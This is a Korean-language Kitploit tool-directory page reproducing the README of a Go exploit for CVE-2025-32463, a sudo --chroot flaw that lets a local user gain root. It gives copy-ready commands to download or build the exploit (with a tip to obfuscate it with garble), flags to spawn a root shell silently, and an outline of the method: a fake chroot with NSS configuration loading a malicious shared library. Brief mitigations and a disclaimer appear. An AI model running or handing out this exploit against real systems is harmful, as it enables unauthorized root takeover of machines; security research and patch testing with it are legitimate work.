Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-32463 — 이 CVE는 sudo 버전 1.9.14부터 1.9.17까지의 취약점을 다루며, 권한이 없는 로컬 사용자가 루트 권한으로 상승할 수 있도록 합니다. | Kitploit
도구/GitHubGitHub/nowafen/cve-2025-32463
Privilege EscalationVulnerability AnalysisExploitationPost-ExploitationPenetration TestingBinary Exploitation
GitHubnowafen/cve-2025-32463

CVE-2025-32463

이 CVE는 sudo 버전 1.9.14부터 1.9.17까지의 취약점을 다루며, 권한이 없는 로컬 사용자가 루트 권한으로 상승할 수 있도록 합니다.

저장소 보기
2621개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-32463 익스플로잇

GitHub stars GitHub license

개요

이 저장소는 sudo 버전 1.9.14~1.9.17에서 발견된 심각한 로컬 권한 상승 취약점(CVSS 9.3)인 CVE-2025-32463을 위한 Go 기반 익스플로잇 도구를 제공합니다. 이 취약점은 --chroot (-R) 옵션의 결함을 악용하여 인증되지 않은 로컬 사용자가 루트 권한을 획득할 수 있게 합니다.

⚠️ 경고: 교육 및 테스트 목적으로만 사용하십시오. 격리된 환경(예: VM)에서 사용하세요. 악의적인 용도로 사용하지 마십시오.

취약점 세부 정보

  • CVE ID: CVE-2025-32463
  • 영향받는 버전: sudo 1.9.14–1.9.17
  • 영향: 로컬 권한 상승으로 루트 획득
  • 설명: 이 익스플로잇은 chroot 환경을 조작하여 악성 공유 라이브러리를 로드하고, UID/GID를 0으로 설정한 후 루트 셸을 실행합니다.

사전 요구 사항

  • Go 1.2+
  • gcc
  • libc-dev
  • 취약한 sudo 버전
  • sudo 접근 권한과 --chroot 권한이 있는 비특권 사용자

빠른 시작

사전 빌드된 바이너리 다운로드

root@kitploit:~
curl -L https://github.com/Nowafen/CVE-2025-32463/releases/download/exploit/exploit -o exploit
chmod +x exploit
./exploit --execution  # 루트 셸 실행

소스에서 빌드

root@kitploit:~
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
go build -o exploit  # 또는 garble을 사용하여 난독화
./exploit --execution

사용법

명령어설명
./exploit --help사용법 도움말 표시
./exploit --aboutCVE 세부 정보 표시
./exploit --execution

확인: 루트 셸에서 id를 실행하면 uid=0(root)가 표시되거나 whoami를 실행하면 root가 표시됩니다.

작동 원리 (개요)

  1. 임시 디렉토리 /tmp/sudowoot.stage.* 생성
  2. 루트 셸을 위한 악성 C 코드(woot1337.c) 생성
  3. NSS 구성이 포함된 가짜 chroot 설정
  4. 공유 라이브러리(libnss_/woot1337.so.2)로 컴파일
  5. sudo -R woot woot 실행하여 라이브러리 로드 및 권한 상승
  6. 임시 파일 자동 정리

완화 방안

  • sudo를 최신 버전으로 업데이트
  • chroot 비활성화: /etc/sudoers에 Defaults !use_chroot 추가

참고 자료

  • NVD 항목

면책 조항

이 도구는 보안 연구를 위한 것입니다. 작성자는 오용에 대해 책임을 지지 않습니다. 항상 책임감 있게 테스트하십시오.


제작: MNM

도구 다운로드
익스플로잇 실행 (루트 셸 열기)
./exploit --execution --silent자동 모드 실행